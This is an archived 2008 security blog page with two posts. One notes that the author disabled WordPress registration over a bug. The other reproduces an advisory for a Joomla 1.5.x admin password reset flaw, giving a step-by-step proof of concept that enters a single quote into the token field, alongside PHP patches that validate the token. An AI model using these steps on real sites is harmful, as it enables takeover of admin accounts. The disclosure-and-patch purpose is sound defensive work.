Archive for the 'Bug' Category

New registration disabled

September 8th, 2008

New bug for WordPress.. Damn.

There is no patch yet.. So, to be safe, I have disabled registration on my blog..

Bug : HERE

Suggested fix: disable user registration

NOTE - This is not a serious bug, because the new password will be sent to the correct admin, not to the hacker

Update: bug fixed after upgrade to 2.6.2

Posted by Mr Am | Filed in BLOG, Bug, Wordpress | 1 Comment »


Joomla 1.5.x Remote Admin Password Change

August 14th, 2008

####################################################
#### Joomla 1.5.x Remote Admin Password Change ####
####################################################

Bug : http://www.milw0rm.com/exploits/6234
Patch : click here
PoC:

1. Go to the URL: www.target.com/index.php?option=com_user&view=reset&layout=confirm
2. Enter the character ' into the “token” field and click OK.
3. Enter a new password for admin.
4. Go to the URL: www.target.com/administrator/
5. Log in as admin with the new password.

Upgrade to the latest Joomla! version (1.5.6 or newer)

or

Add the following code after global $mainframe; on line 113 of reset.php

[sourcecode language='php']

// Reject any token that is not exactly 32 characters long before it is
// used to look up the user; a lone ' (the PoC input) fails this check.
if (strlen($token) != 32) {
    $this->setError(JText::_('INVALID_TOKEN'));
    return false;
}

[/sourcecode]
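As an added illustration (not Joomla's own code and not the patch above): a stricter standalone version of the same check, assuming that a valid reset token is always 32 hexadecimal characters (an md5-style hash), so that malformed input such as the PoC character is rejected before any database query runs.

```php
<?php
// Added illustration, not Joomla's code. Assumption: valid reset tokens are
// 32 hex characters, so length alone is not enough; the character set is
// checked as well, which also rejects a token of the right length that
// contains a quote or other non-hex character.
function isValidResetToken($token): bool
{
    // Must be a string of exactly 32 characters (the page's fix) ...
    if (!is_string($token) || strlen($token) !== 32) {
        return false;
    }
    // ... and every character must be 0-9 or a-f/A-F.
    return ctype_xdigit($token);
}

// Constructed sample inputs and the expected verdict for each.
$samples = [
    "'"                        => false, // the PoC input: wrong length, bad char
    ''                         => false, // empty token
    str_repeat('a', 32)        => true,  // well-formed 32-hex token
    str_repeat('a', 31) . "'"  => false, // right length, non-hex character
];

foreach ($samples as $token => $expected) {
    $result = isValidResetToken($token);
    printf("%-36s => %s\n", var_export($token, true), $result ? 'accepted' : 'rejected');
    assert($result === $expected);
}
```

Only the well-formed 32-hex token is accepted; the other three are rejected before the lookup, which is the point of placing the check ahead of the query.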

Posted by Mr Am | Filed in Bug, Hacker, Network Security, hacking | 2 Comments »